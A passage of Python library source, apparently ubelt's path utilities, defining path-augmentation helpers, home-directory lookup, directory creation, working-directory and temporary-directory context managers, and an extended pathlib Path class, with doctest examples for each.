ub\n >>> path = 'foo.bar'\n >>> suffix = '_suff'\n >>> prefix = 'pref_'\n >>> ext = '.baz'\n >>> newpath = ub.augpath(path, suffix, prefix, ext=ext, base='bar')\n >>> print('newpath = %s' % (newpath,))\n newpath = pref_bar_suff.baz\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> augpath('foo.bar')\n 'foo.bar'\n >>> augpath('foo.bar', ext='.BAZ')\n 'foo.BAZ'\n >>> augpath('foo.bar', suffix='_')\n 'foo_.bar'\n >>> augpath('foo.bar', prefix='_')\n '_foo.bar'\n >>> augpath('foo.bar', base='baz')\n 'baz.bar'\n >>> augpath('foo.tar.gz', ext='.zip', multidot=True)\n foo.zip\n >>> augpath('foo.tar.gz', ext='.zip', multidot=False)\n foo.tar.zip\n >>> augpath('foo.tar.gz', suffix='_new', multidot=True)\n foo_new.tar.gz\n >>> augpath('foo.tar.gz', suffix='_new', tail='.cache', multidot=True)\n foo_new.tar.gz.cache\n \"\"\"\n stem = base # new nomenclature\n\n # Breakup path\n if relative is None:\n orig_dpath, fname = split(path)\n else: # nocover\n # if path.startswith(relative):\n # orig_dpath = relative\n # fname = relpath(path, relative)\n # else:\n # orig_dpath, fname = split(path)\n raise NotImplementedError('Not implemented yet')\n\n if multidot:\n # The first dot defines the extension\n parts = fname.split('.', 1)\n orig_base = parts[0]\n orig_ext = '' if len(parts) == 1 else '.' + parts[1]\n else:\n # The last dot defines the extension\n orig_base, orig_ext = splitext(fname)\n # Replace parts with specified augmentations\n if dpath is None:\n dpath = orig_dpath\n if ext is None:\n ext = orig_ext\n if stem is None:\n stem = orig_base\n # Recombine into new path\n new_fname = ''.join((prefix, stem, suffix, ext, tail))\n newpath = join(dpath, new_fname)\n return newpath\n\n\ndef userhome(username=None):\n \"\"\"\n Returns the path to some user's home directory.\n\n Args:\n username (str | None):\n name of a user on the system. If unspecified, the current user is\n inferred from standard environment variables.\n\n Returns:\n str: path to the specified home directory\n\n Raises:\n KeyError: if the specified user does not exist on the system\n\n OSError: if username is unspecified and the current user cannot be\n inferred\n\n Example:\n >>> import ubelt as ub\n >>> import os\n >>> import getpass\n >>> username = getpass.getuser()\n >>> userhome_target = os.path.expanduser('~')\n >>> userhome_got1 = ub.userhome()\n >>> userhome_got2 = ub.userhome(username)\n >>> print(f'username={username}')\n >>> print(f'userhome_got1={userhome_got1}')\n >>> print(f'userhome_got2={userhome_got2}')\n >>> print(f'userhome_target={userhome_target}')\n >>> assert userhome_got1 == userhome_target\n >>> assert userhome_got2 == userhome_target\n \"\"\"\n if username is None:\n # get home directory for the current user\n if 'HOME' in os.environ:\n userhome_dpath = os.environ['HOME']\n else: # nocover\n if sys.platform.startswith('win32'):\n # win32 fallback when HOME is not defined\n if 'USERPROFILE' in os.environ:\n userhome_dpath = os.environ['USERPROFILE']\n elif 'HOMEPATH' in os.environ:\n drive = os.environ.get('HOMEDRIVE', '')\n userhome_dpath = join(drive, os.environ['HOMEPATH'])\n else:\n raise OSError(\"Cannot determine the user's home directory\")\n else:\n # posix fallback when HOME is not defined\n import pwd\n userhome_dpath = pwd.getpwuid(os.getuid()).pw_dir\n else:\n # A specific user directory was requested\n if sys.platform.startswith('win32'): # nocover\n # get the directory name for the current user\n c_users = dirname(userhome())\n userhome_dpath = join(c_users, username)\n if not exists(userhome_dpath):\n raise KeyError('Unknown user: {}'.format(username))\n else:\n import pwd\n try:\n pwent = pwd.getpwnam(username)\n except KeyError: # nocover\n raise KeyError('Unknown user: {}'.format(username))\n userhome_dpath = pwent.pw_dir\n return userhome_dpath\n\n\ndef shrinkuser(path, home='~'):\n \"\"\"\n Inverse of :func:`os.path.expanduser`.\n\n Args:\n path (str | PathLike): path in system file structure\n home (str): symbol used to replace the home path.\n Defaults to ``'~'``, but you might want to use ``'$HOME'`` or\n ``'%USERPROFILE%'`` instead.\n\n Returns:\n str: shortened path replacing the home directory with a symbol\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> path = expanduser('~')\n >>> assert path != '~'\n >>> assert shrinkuser(path) == '~'\n >>> assert shrinkuser(path + '1') == path + '1'\n >>> assert shrinkuser(path + '/1') == join('~', '1')\n >>> assert shrinkuser(path + '/1', '$HOME') == join('$HOME', '1')\n >>> assert shrinkuser('.') == '.'\n \"\"\"\n path = normpath(path)\n userhome_dpath = userhome()\n if path.startswith(userhome_dpath):\n if len(path) == len(userhome_dpath):\n path = home\n elif path[len(userhome_dpath)] == os.path.sep:\n path = home + path[len(userhome_dpath):]\n return path\n\n\ndef expandpath(path):\n \"\"\"\n Shell-like environment variable and tilde path expansion.\n\n Args:\n path (str | PathLike): string representation of a path\n\n Returns:\n str: expanded path\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> import ubelt as ub\n >>> assert normpath(ub.expandpath('~/foo')) == join(ub.userhome(), 'foo')\n >>> assert ub.expandpath('foo') == 'foo'\n \"\"\"\n path = expanduser(path)\n path = expandvars(path)\n return path\n\n\ndef ensuredir(dpath, mode=0o1777, verbose=0, recreate=False):\n r\"\"\"\n Ensures that directory will exist. Creates new dir with sticky bits by\n default\n\n Args:\n dpath (str | PathLike | Tuple[str | PathLike]):\n directory to create if it does not exist.\n\n mode (int):\n octal permissions if a new directory is created.\n Defaults to 0o1777.\n\n verbose (int): verbosity\n\n recreate (bool): if True removes the directory and\n all of its contents and creates a new empty directory.\n DEPRECATED: Use ``ub.Path(dpath).delete().ensuredir()`` instead.\n\n Returns:\n str: the ensured directory\n\n SeeAlso:\n :func:`ubelt.Path.ensuredir`\n\n Example:\n >>> import ubelt as ub\n >>> dpath = ub.Path.appdir('ubelt', 'ensuredir')\n >>> dpath.delete()\n >>> assert not dpath.exists()\n >>> ub.ensuredir(dpath)\n >>> assert dpath.exists()\n >>> dpath.delete()\n \"\"\"\n if isinstance(dpath, (list, tuple)):\n dpath = join(*dpath)\n\n if recreate:\n import ubelt as ub\n ub.schedule_deprecation(\n modname='ubelt',\n migration='Use ``ub.Path(dpath).delete().ensuredir()`` instead', name='recreate',\n type='argument of ensuredir', deprecate='1.3.0', error='2.0.0',\n remove='2.1.0',\n )\n util_io.delete(dpath, verbose=verbose)\n\n if not exists(dpath):\n if verbose:\n print('Ensuring directory (creating {!r})'.format(dpath))\n os.makedirs(normpath(dpath), mode=mode, exist_ok=True)\n else:\n if verbose:\n print('Ensuring directory (existing {!r})'.format(dpath))\n return dpath\n\n\nclass ChDir:\n \"\"\"\n Context manager that changes the current working directory and then\n returns you to where you were.\n\n This is nearly the same as the stdlib :func:`contextlib.chdir`, with the\n exception that it will do nothing if the input path is None (i.e. the user\n did not want to change directories).\n\n Args:\n dpath (str | PathLike | None):\n The new directory to work in.\n If None, then the context manager is disabled.\n\n SeeAlso:\n :func:`contextlib.chdir`\n\n Example:\n >>> import ubelt as ub\n >>> dpath = ub.Path.appdir('ubelt/tests/chdir').ensuredir()\n >>> dir1 = (dpath / 'dir1').ensuredir()\n >>> dir2 = (dpath / 'dir2').ensuredir()\n >>> with ChDir(dpath):\n >>> assert ub.Path.cwd() == dpath\n >>> # change to the given directory, and then returns back\n >>> with ChDir(dir1):\n >>> assert ub.Path.cwd() == dir1\n >>> with ChDir(dir2):\n >>> assert ub.Path.cwd() == dir2\n >>> # changes inside the context manager will be reset\n >>> os.chdir(dpath)\n >>> assert ub.Path.cwd() == dir1\n >>> assert ub.Path.cwd() == dpath\n >>> with ChDir(dir1):\n >>> assert ub.Path.cwd() == dir1\n >>> with ChDir(None):\n >>> assert ub.Path.cwd() == dir1\n >>> # When disabled, the cwd does *not* reset at context exit\n >>> os.chdir(dir2)\n >>> assert ub.Path.cwd() == dir2\n >>> os.chdir(dir1)\n >>> # Dont change dirs, but reset to your cwd at context end\n >>> with ChDir('.'):\n >>> os.chdir(dir2)\n >>> assert ub.Path.cwd() == dir1\n >>> assert ub.Path.cwd() == dpath\n \"\"\"\n def __init__(self, dpath):\n self._context_dpath = dpath\n self._orig_dpath = None\n\n def __enter__(self):\n \"\"\"\n Returns:\n ChDir: self\n \"\"\"\n if self._context_dpath is not None:\n self._orig_dpath = os.getcwd()\n os.chdir(self._context_dpath)\n return self\n\n def __exit__(self, ex_type, ex_value, ex_traceback):\n \"\"\"\n Args:\n ex_type (Type[BaseException] | None):\n ex_value (BaseException | None):\n ex_traceback (TracebackType | None):\n\n Returns:\n bool | None\n \"\"\"\n if self._context_dpath is not None:\n os.chdir(self._orig_dpath)\n\n\nclass TempDir:\n \"\"\"\n Context for creating and cleaning up temporary directories.\n\n DEPRECATED. Use :mod:`tempfile` instead.\n\n Note:\n This exists because :class:`tempfile.TemporaryDirectory` was\n introduced in Python 3.2. Thus once ubelt no longer supports\n python 2.7, this class will be deprecated.\n\n Attributes:\n dpath (str | None)\n\n Note:\n # WE MAY WANT TO KEEP THIS FOR WINDOWS.\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> with TempDir() as self:\n >>> dpath = self.dpath\n >>> assert exists(dpath)\n >>> assert not exists(dpath)\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> self = TempDir()\n >>> dpath = self.ensure()\n >>> assert exists(dpath)\n >>> self.cleanup()\n >>> assert not exists(dpath)\n \"\"\"\n def __init__(self):\n import ubelt as ub\n ub.schedule_deprecation(\n modname='ubelt',\n migration='Use tempfile instead', name='TempDir',\n type='class', deprecate='1.2.0', error='1.4.0',\n remove='1.5.0',\n )\n self.dpath = None\n\n def __del__(self):\n self.cleanup()\n\n def ensure(self):\n import tempfile\n if not self.dpath:\n self.dpath = tempfile.mkdtemp()\n return self.dpath\n\n def cleanup(self):\n if self.dpath:\n import shutil\n shutil.rmtree(self.dpath)\n self.dpath = None\n\n def start(self):\n self.ensure()\n return self\n\n def __enter__(self):\n return self.start()\n\n def __exit__(self, ex_type, ex_value, ex_traceback):\n \"\"\"\n Args:\n ex_type (Type[BaseException] | None):\n ex_value (BaseException | None):\n ex_traceback (TracebackType | None):\n\n Returns:\n bool | None\n \"\"\"\n self.cleanup()\n\n\n_PathBase = pathlib.WindowsPath if os.name == 'nt' else pathlib.PosixPath\n\n\nclass Path(_PathBase):\n \"\"\"\n This class extends :class:`pathlib.Path` with extra functionality and\n convenience methods.\n\n New methods are designed to support chaining.\n\n In addition to new methods this class supports the addition (``+``)\n operator via which allows for better drop-in compatibility with code using\n existing string-based paths.\n\n Note:\n On windows this inherits from :class:`pathlib.WindowsPath`.\n\n New methods are\n\n * :py:meth:`ubelt.Path.ensuredir` - Like mkdir but with easier defaults.\n\n * :py:meth:`ubelt.Path.delete` - Previously pathlib could only remove one file at a time.\n\n * :py:meth:`ubelt.Path.copy` - Pathlib has no similar functionality.\n\n * :py:meth:`ubelt.Path.move` - Pathlib has no similar functionality.\n\n * :py:meth:`ubelt.Path.augment` - Unifies and extends disparate functionality across pathlib.\n\n * :py:meth:`ubelt.Path.expand` - Unifies existing environ and home expansion.\n\n * :py:meth:`ubelt.Path.ls` - Like iterdir, but more interactive.\n\n * :py:meth:`ubelt.Path.shrinkuser` - Python has no similar functionality.\n\n * :py:meth:`ubelt.Path.walk` - Pathlib had no similar functionality.\n\n New classmethods are\n\n * :py:meth:`ubelt.Path.appdir` - application directories\n\n Modified methods are\n\n * :py:meth:`ubelt.Path.touch` - returns self to support chaining\n\n Example:\n >>> # Ubelt extends pathlib functionality\n >>> import ubelt as ub\n >>> # Chain expansion and mkdir with cumbersome args.\n >>> dpath = ub.Path('~/.cache/ubelt/demo_path').expand().ensuredir()\n >>> fpath = dpath / 'text_file.txt'\n >>> # Augment is concise and chainable\n >>> aug_fpath = fpath.augment(stemsuffix='.aux', ext='.jpg').touch()\n >>> aug_dpath = dpath.augment(stemsuffix='demo_path2')\n >>> assert aug_fpath.read_text() == ''\n >>> fpath.write_text('text data')\n >>> assert aug_fpath.exists()\n >>> # Delete is akin to \"rm -rf\" and is also chainable.\n >>> assert not aug_fpath.delete().exists()\n >>> assert dpath.exists()\n >>> assert not dpath.delete().exists()\n >>> print(f'{str(fpath.shrinkuser()).replace(os.path.sep, \"/\")}')\n >>> print(f'{str(dpath.shrinkuser()).replace(os.path.sep, \"/\")}')\n >>> print(f'{str(aug_fpath.shrinkuser()).replace(os.path.sep, \"/\")}')\n >>> print(f'{str(aug_dpath.shrinkuser()).replace(os.path.sep, \"/\")}')\n ~/.cache/ubelt/demo_path/text_file.txt\n ~/.cache/ubelt/demo_path\n ~/.cache/ubelt/demo_path/text_file.aux.jpg\n ~/.cache/ubelt/demo_pathdemo_path2\n\n Inherited unmodified properties from :class:`pathlib.Path` are:\n\n * :py:data:`pathlib.PurePath.anchor`\n * :py:data:`pathlib.PurePath.name`\n * :py:data:`pathlib.PurePath.parts`\n * :py:data:`pathlib.PurePath.parent`\n * :py:data:`pathlib.PurePath.parents`\n * :py:data:`pathlib.PurePath.suffix`\n * :py:data:`pathlib.PurePath.suffixes`\n * :py:data:`pathlib.PurePath.stem`\n * :py:data:`pathlib.PurePath.drive`\n * :py:data:`pathlib.PurePath.root`\n\n Inherited unmodified classmethods from :class:`pathlib.Path` are:\n\n * :py:meth:`pathlib.Path.cwd`\n * :py:meth:`pathlib.Path.home`\n\n Inherited unmodified methods from :class:`pathlib.Path` are:\n\n * :py:meth:`pathlib.Path.samefile`\n * :py:meth:`pathlib.Path.iterdir`\n\n * :py:meth:`pathlib.Path.glob`\n * :py:meth:`pathlib.Path.rglob`\n\n * :py:meth:`pathlib.Path.resolve`\n\n * :py:meth:`pathlib.Path.lstat`\n * :py:meth:`pathlib.Path.stat`\n * :py:meth:`pathlib.Path.owner`\n * :py:meth:`pathlib.Path.group`\n\n * :py:meth:`pathlib.Path.open`\n * :py:meth:`pathlib.Path.read_bytes`\n * :py:meth:`pathlib.Path.read_text`\n * :py:meth:`pathlib.Path.write_bytes`\n * :py:meth:`pathlib.Path.write_text`\n * :py:meth:`pathlib.Path.readlink`\n\n * :py:meth:`pathlib.Path.mkdir` - we recommend :py:meth:`ubelt.Path.ensuredir` instead.\n\n * :py:meth:`pathlib.Path.chmod`\n * :py:meth:`pathlib.Path.lchmod`\n\n * :py:meth:`pathlib.Path.unlink`\n * :py:meth:`pathlib.Path.rmdir`\n\n * :py:meth:`pathlib.Path.rename`\n * :py:meth:`pathlib.Path.replace`\n\n * :py:meth:`pathlib.Path.symlink_to`\n * :py:meth:`pathlib.Path.hardlink_to`\n * :py:meth:`pathlib.Path.link_to` - deprecated\n\n * :py:meth:`pathlib.Path.exists`\n * :py:meth:`pathlib.Path.is_dir`\n * :py:meth:`pathlib.Path.is_file`\n * :py:meth:`pathlib.Path.is_mount`\n * :py:meth:`pathlib.Path.is_symlink`\n * :py:meth:`pathlib.Path.is_block_device`\n * :py:meth:`pathlib.Path.is_char_device`\n * :py:meth:`pathlib.Path.is_fifo`\n * :py:meth:`pathlib.Path.is_socket`\n\n * :py:meth:`pathlib.Path.expanduser` - we recommend :py:meth:`ubelt.Path.expand` instead.\n\n * :py:meth:`pathlib.PurePath.as_posix`\n * :py:meth:`pathlib.PurePath.as_uri`\n\n * :py:meth:`pathlib.PurePath.with_name` - we recommend :py:meth:`ubelt.Path.augment` instead.\n * :py:meth:`pathlib.PurePath.with_stem` - we recommend :py:meth:`ubelt.Path.augment` instead.\n * :py:meth:`pathlib.PurePath.with_suffix` - we recommend :py:meth:`ubelt.Path.augment` instead.\n\n * :py:meth:`pathlib.PurePath.relative_to`\n\n * :py:meth:`pathlib.PurePath.joinpath`\n\n * :py:meth:`pathlib.PurePath.is_relative_to`\n * :py:meth:`pathlib.PurePath.is_absolute`\n * :py:meth:`pathlib.PurePath.is_reserved`\n\n * :py:meth:`pathlib.PurePath.match`\n \"\"\"\n __slots__ = ()\n\n @classmethod\n def appdir(cls, appname=None, *args, type='cache'):\n \"\"\"\n Returns a standard platform specific directory for an application to\n use as cache, config, or data.\n\n The default root location depends on the platform and is specified the\n the following table:\n\n TextArt:\n\n | POSIX | Windows | MacOSX\n data | $XDG_DATA_HOME | %APPDATA% | ~/Library/Application Support\n config | $XDG_CONFIG_HOME | %APPDATA% | ~/Library/Application Support\n cache | $XDG_CACHE_HOME | %LOCALAPPDATA% | ~/Library/Caches\n\n\n If an environment variable is not specified the defaults are:\n APPDATA = ~/AppData/Roaming\n LOCALAPPDATA = ~/AppData/Local\n\n XDG_DATA_HOME = ~/.local/share\n XDG_CACHE_HOME = ~/.cache\n XDG_CONFIG_HOME = ~/.config\n\n Args:\n appname (str | None):\n The name of the application.\n\n *args : optional subdirs\n\n type (str):\n the type of data the expected to be stored in this application\n directory. Valid options are 'cache', 'config', or 'data'.\n\n Returns:\n Path: a new path object for the specified application directory.\n\n SeeAlso:\n This provides functionality similar to the\n `appdirs `_ -\n and\n `platformdirs `_ -\n packages.\n\n Example:\n >>> # xdoctest: +IGNORE_WANT\n >>> import ubelt as ub\n >>> print(ub.Path.appdir('ubelt', type='cache').shrinkuser())\n >>> print(ub.Path.appdir('ubelt', type='config').shrinkuser())\n >>> print(ub.Path.appdir('ubelt', type='data').shrinkuser())\n ~/.cache/ubelt\n ~/.config/ubelt\n ~/.local/share/ubelt\n >>> import pytest\n >>> with pytest.raises(KeyError):\n >>> ub.Path.appdir('ubelt', type='other')\n\n Example:\n >>> # xdoctest: +IGNORE_WANT\n >>> import ubelt as ub\n >>> # Can now call appdir without any arguments\n >>> print(ub.Path.appdir().shrinkuser())\n ~/.cache\n \"\"\"\n from ubelt import util_platform\n if type == 'cache':\n base = util_platform.platform_cache_dir()\n elif type == 'config':\n base = util_platform.platform_config_dir()\n elif type == 'data':\n base = util_platform.platform_data_dir()\n else:\n raise KeyError(type)\n\n if appname is None:\n return cls(base, *args)\n else:\n return cls(base, appname, *args)\n\n def augment(self, prefix='', stemsuffix='', ext=None, stem=None, dpath=None,\n tail='', relative=None, multidot=False, suffix=''):\n \"\"\"\n Create a new path with a different extension, basename, directory,\n prefix, and/or suffix.\n\n See :func:`augpath` for more details.\n\n Args:\n prefix (str):\n Text placed in front of the stem. Defaults to ''.\n\n stemsuffix (str):\n Text placed between the stem and extension. Defaults to ''.\n\n ext (str | None):\n If specified, replaces the extension\n\n stem (str | None):\n If specified, replaces the stem (i.e. basename without\n extension).\n\n dpath (str | PathLike | None):\n If specified, replaces the specified \"relative\" directory,\n which by default is the parent directory.\n\n tail (str | None):\n If specified, appends this text the very end of the path -\n after the extension.\n\n relative (str | PathLike | None):\n Replaces ``relative`` with ``dpath`` in ``path``.\n Has no effect if ``dpath`` is not specified.\n Defaults to the dirname of the input ``path``.\n *experimental* not currently implemented.\n\n multidot (bool): Allows extensions to contain\n multiple dots. Specifically, if False, everything after the\n last dot in the basename is the extension. If True, everything\n after the first dot in the basename is the extension.\n\n SeeAlso:\n :py:meth:`pathlib.Path.with_stem`\n :py:meth:`pathlib.Path.with_name`\n :py:meth:`pathlib.Path.with_suffix`\n\n Returns:\n Path: augmented path\n\n Note:\n NOTICE OF BACKWARDS INCOMPATABILITY.\n\n THE INITIAL RELEASE OF Path.augment suffered from an unfortunate\n variable naming decision that conflicts with pathlib.Path\n\n .. code:: python\n\n p = ub.Path('the.entire.fname.or.dname.is.the.name.exe')\n print(f'p ={p}')\n print(f'p.name={p.name}')\n p = ub.Path('the.stem.ends.here.ext')\n print(f'p ={p}')\n print(f'p.stem={p.stem}')\n p = ub.Path('only.the.last.dot.is.the.suffix')\n print(f'p ={p}')\n print(f'p.suffix={p.suffix}')\n p = ub.Path('but.all.suffixes.can.be.recovered')\n print(f'p ={p}')\n print(f'p.suffixes={p.suffixes}')\n\n Example:\n >>> import ubelt as ub\n >>> path = ub.Path('foo.bar')\n >>> suffix = '_suff'\n >>> prefix = 'pref_'\n >>> ext = '.baz'\n >>> newpath = path.augment(prefix=prefix, stemsuffix=suffix, ext=ext, stem='bar')\n >>> print('newpath = {!r}'.format(newpath))\n newpath = Path('pref_bar_suff.baz')\n\n Example:\n >>> import ubelt as ub\n >>> path = ub.Path('foo.bar')\n >>> stemsuffix = '_suff'\n >>> prefix = 'pref_'\n >>> ext = '.baz'\n >>> newpath = path.augment(prefix=prefix, stemsuffix=stemsuffix, ext=ext, stem='bar')\n >>> print('newpath = {!r}'.format(newpath))\n\n Example:\n >>> # Compare our augpath(ext=...) versus pathlib with_suffix(...)\n >>> import ubelt as ub\n >>> cases = [\n >>> ub.Path('no_ext'),\n >>> ub.Path('one.ext'),\n >>> ub.Path('double..dot'),\n >>> ub.Path('two.many.cooks'),\n >>> ub.Path('path.with.three.dots'),\n >>> ub.Path('traildot.'),\n >>> ub.Path('doubletraildot..'),\n >>> ub.Path('.prefdot'),\n >>> ub.Path('..doubleprefdot'),\n >>> ]\n >>> for path in cases:\n >>> print('--')\n >>> print('path = {}'.format(ub.repr2(path, nl=1)))\n >>> ext = '.EXT'\n >>> method_pathlib = path.with_suffix(ext)\n >>> method_augment = path.augment(ext=ext)\n >>> if method_pathlib == method_augment:\n >>> print(ub.color_text('sagree', 'green'))\n >>> else:\n >>> print(ub.color_text('disagree', 'red'))\n >>> print('path.with_suffix({}) = {}'.format(ext, ub.repr2(method_pathlib, nl=1)))\n >>> print('path.augment(ext={}) = {}'.format(ext, ub.repr2(method_augment, nl=1)))\n >>> print('--')\n \"\"\"\n if suffix: # nocover\n from ubelt.util_deprecate import schedule_deprecation\n schedule_deprecation(\n 'ubelt', 'suffix', 'arg',\n deprecate='1.1.3', remove='1.4.0',\n migration='Use stemsuffix instead',\n )\n if not stemsuffix:\n stemsuffix = suffix\n warnings.warn(\n 'DEVELOPER NOTICE: The ubelt.Path.augment function may '\n 'experience a BACKWARDS INCOMPATIBLE update in the future '\n 'having to do with the suffix argument to ub.Path.augment '\n 'To avoid any issue use the ``stemsuffix` argument or use the '\n '``ubelt.augpath`` function instead. '\n 'If you see this warning, please make an '\n 'issue on https://github.com/Erotemic/ubelt/issues indicating '\n 'that there are users of this function in the wild. If there '\n 'are none, then this signature will be \"fixed\", but if anyone '\n 'depends on this feature then we will continue to support it as '\n 'is.'\n )\n\n aug = augpath(self, suffix=stemsuffix, prefix=prefix, ext=ext, base=stem,\n dpath=dpath, relative=relative, multidot=multidot,\n tail=tail)\n new = self.__class__(aug)\n return new\n\n def delete(self):\n \"\"\"\n Removes a file or recursively removes a directory.\n If a path does not exist, then this is does nothing.\n\n SeeAlso:\n :func:`ubelt.delete`\n\n Returns:\n Path: reference to self\n\n Example:\n >>> import ubelt as ub\n >>> from os.path import join\n >>> base = ub.Path.appdir('ubelt', 'delete_test2')\n >>> dpath1 = (base / 'dir').ensuredir()\n >>> (base / 'dir' / 'subdir').ensuredir()\n >>> (base / 'dir' / 'to_remove1.txt').touch()\n >>> fpath1 = (base / 'dir' / 'subdir' / 'to_remove3.txt').touch()\n >>> fpath2 = (base / 'dir' / 'subdir' / 'to_remove2.txt').touch()\n >>> assert all(p.exists() for p in [dpath1, fpath1, fpath2])\n >>> fpath1.delete()\n >>> assert all(p.exists() for p in [dpath1, fpath2])\n >>> assert not fpath1.exists()\n >>> dpath1.delete()\n >>> assert not any(p.exists() for p in [dpath1, fpath1, fpath2])\n \"\"\"\n util_io.delete(self)\n return self\n\n def ensuredir(self, mode=0o777):\n \"\"\"\n Concise alias of ``self.mkdir(parents=True, exist_ok=True)``\n\n Args:\n mode (int):\n octal permissions if a new directory is created.\n Defaults to 0o777.\n\n Returns:\n Path: returns itself\n\n Example:\n >>> import ubelt as ub\n >>> cache_dpath = ub.Path.appdir('ubelt').ensuredir()\n >>> dpath = ub.Path(cache_dpath, 'newdir')\n >>> dpath.delete()\n >>> assert not dpath.exists()\n >>> dpath.ensuredir()\n >>> assert dpath.exists()\n >>> dpath.rmdir()\n \"\"\"\n self.mkdir(mode=mode, parents=True, exist_ok=True)\n return self\n\n def mkdir(self, mode=511, parents=False, exist_ok=False):\n \"\"\"\n Create a new directory at this given path.\n\n Note:\n The ubelt extension is the same as the original pathlib method,\n except this returns returns the path instead of None.\n\n Args:\n mode (int) : permission bits\n parents (bool) : create parents\n exist_ok (bool) : fail if exists\n\n Returns:\n Path: returns itself\n \"\"\"\n super().mkdir(mode=mode, parents=parents, exist_ok=exist_ok)\n return self\n\n def expand(self):\n \"\"\"\n Expands user tilde and environment variables.\n\n Concise alias of ``Path(os.path.expandvars(self.expanduser()))``\n\n Returns:\n Path: path with expanded environment variables and tildes\n\n Example:\n >>> import ubelt as ub\n >>> home_v1 = ub.Path('~/').expand()\n >>> home_v2 = ub.Path.home()\n >>> print('home_v1 = {!r}'.format(home_v1))\n >>> print('home_v2 = {!r}'.format(home_v2))\n >>> assert home_v1 == home_v2\n \"\"\"\n return self.expandvars().expanduser()\n\n def expandvars(self):\n \"\"\"\n As discussed in [CPythonIssue21301]_, CPython won't be adding\n expandvars to pathlib. I think this is a mistake, so I added it in this\n extension.\n\n Returns:\n Path: path with expanded environment variables\n\n References:\n .. [CPythonIssue21301] https://bugs.python.org/issue21301\n \"\"\"\n return self.__class__(os.path.expandvars(self))\n\n def ls(self, pattern=None):\n \"\"\"\n A convenience function to list all paths in a directory.\n\n This is a wrapper around iterdir that returns the results as a list\n instead of a generator. This is mainly for faster navigation in\n IPython. In production code ``iterdir`` or ``glob`` should be used\n instead.\n\n Args:\n pattern (None | str):\n if specified, performs a glob instead of an iterdir.\n\n Returns:\n List['Path']: an eagerly evaluated list of paths\n\n Note:\n When pattern is specified only paths matching the pattern are\n returned, not the paths inside matched directories. This is\n different than bash semantics where the pattern is first expanded\n and then ls is performed on all matching paths.\n\n Example:\n >>> import ubelt as ub\n >>> self = ub.Path.appdir('ubelt/tests/ls')\n >>> (self / 'dir1').ensuredir()\n >>> (self / 'dir2').ensuredir()\n >>> (self / 'file1').touch()\n >>> (self / 'file2').touch()\n >>> (self / 'dir1/file3').touch()\n >>> (self / 'dir2/file4').touch()\n >>> children = self.ls()\n >>> assert isinstance(children, list)\n >>> print(ub.repr2(sorted([p.relative_to(self) for p in children])))\n [\n Path('dir1'),\n Path('dir2'),\n Path('file1'),\n Path('file2'),\n ]\n >>> children = self.ls('dir*/*')\n >>> assert isinstance(children, list)\n >>> print(ub.repr2(sorted([p.relative_to(self) for p in children])))\n [\n Path('dir1/file3'),\n Path('dir2/file4'),\n ]\n \"\"\"\n if pattern is None:\n return list(self.iterdir())\n else:\n return list(self.glob(pattern))\n\n # TODO:\n # def _glob(self):\n # \"\"\"\n # I would like some way of globbing using patterns contained in the path\n # itself. Perhaps this goes into expand?\n # \"\"\"\n # import glob\n # yield from map(self.__class__, glob.glob(self))\n\n def shrinkuser(self, home='~'):\n \"\"\"\n Shrinks your home directory by replacing it with a tilde.\n\n This is the inverse of :func:`os.path.expanduser`.\n\n Args:\n home (str): symbol used to replace the home path.\n Defaults to '~', but you might want to use '$HOME' or\n '%USERPROFILE%' instead.\n\n Returns:\n Path: shortened path replacing the home directory with a symbol\n\n Example:\n >>> import ubelt as ub\n >>> path = ub.Path('~').expand()\n >>> assert str(path.shrinkuser()) == '~'\n >>> assert str(ub.Path((str(path) + '1')).shrinkuser()) == str(path) + '1'\n >>> assert str((path / '1').shrinkuser()) == join('~', '1')\n >>> assert str((path / '1').shrinkuser('$HOME')) == join('$HOME', '1')\n >>> assert str(ub.Path('.').shrinkuser()) == '.'\n \"\"\"\n shrunk = shrinkuser(self, home)\n new = self.__class__(shrunk)\n return new\n\n def touch(self, mode=0o666, exist_ok=True):\n \"\"\"\n Create this file with the given access mode, if it doesn't exist.\n\n Returns:\n Path: returns itself\n\n Note:\n The :func:`ubelt.util_io.touch` function currently has a slightly\n different implementation. This uses whatever the pathlib version\n is. This may change in the future.\n \"\"\"\n # modify touch to return self\n # Note: util_io.touch is more expressive than standard python\n # touch, may want to use that instead.\n super().touch(mode=mode, exist_ok=exist_ok)\n return self\n\n def walk(self, topdown=True, onerror=None, followlinks=False):\n \"\"\"\n A variant of :func:`os.walk` for pathlib\n\n Args:\n topdown (bool):\n if True starts yield nodes closer to the root first otherwise\n yield nodes closer to the leaves first.\n\n onerror (Callable[[OSError], None] | None):\n A function with one argument of type OSError. If the\n error is raised the walk is aborted, otherwise it continues.\n\n followlinks (bool):\n if True recurse into symbolic directory links\n\n Yields:\n Tuple['Path', List[str], List[str]]:\n the root path, directory names, and file names\n\n Example:\n >>> import ubelt as ub\n >>> self = ub.Path.appdir('ubelt/tests/ls')\n >>> (self / 'dir1').ensuredir()\n >>> (self / 'dir2').ensuredir()\n >>> (self / 'file1').touch()\n >>> (self / 'file2').touch()\n >>> (self / 'dir1/file3').touch()\n >>> (self / 'dir2/file4').touch()\n >>> subdirs = list(self.walk())\n >>> assert len(subdirs) == 3\n\n Example:\n >>> # Modified from the stdlib\n >>> import os\n >>> from os.path import join, getsize\n >>> import email\n >>> import ubelt as ub\n >>> base = ub.Path(email.__file__).parent\n >>> for root, dirs, files in base.walk():\n >>> print(root, \" consumes\", end=\"\")\n >>> print(sum(getsize(join(root, name)) for name in files), end=\"\")\n >>> print(\"bytes in \", len(files), \" non-directory files\")\n >>> if 'CVS' in dirs:\n >>> dirs.remove('CVS') # don't visit CVS directories\n \"\"\"\n cls = self.__class__\n walker = os.walk(self, topdown=topdown, onerror=onerror,\n followlinks=followlinks)\n for root, dnames, fnames in walker:\n yield (cls(root), dnames, fnames)\n\n def __add__(self, other):\n \"\"\"\n Returns a new string starting with this fspath representation.\n\n Returns:\n str\n\n Allows ubelt.Path to be a better drop-in replacement when working with\n string-based paths.\n\n Note:\n It is not recommended to write new code that uses this behavior.\n This exists to make it easier to transition existing str-based\n paths to pathlib.\n\n Example:\n >>> import ubelt as ub\n >>> base = ub.Path('base')\n >>> base_ = ub.Path('base/')\n >>> base2 = ub.Path('base/2')\n >>> assert base + 'foo' == 'basefoo'\n >>> assert base_ + 'foo' == 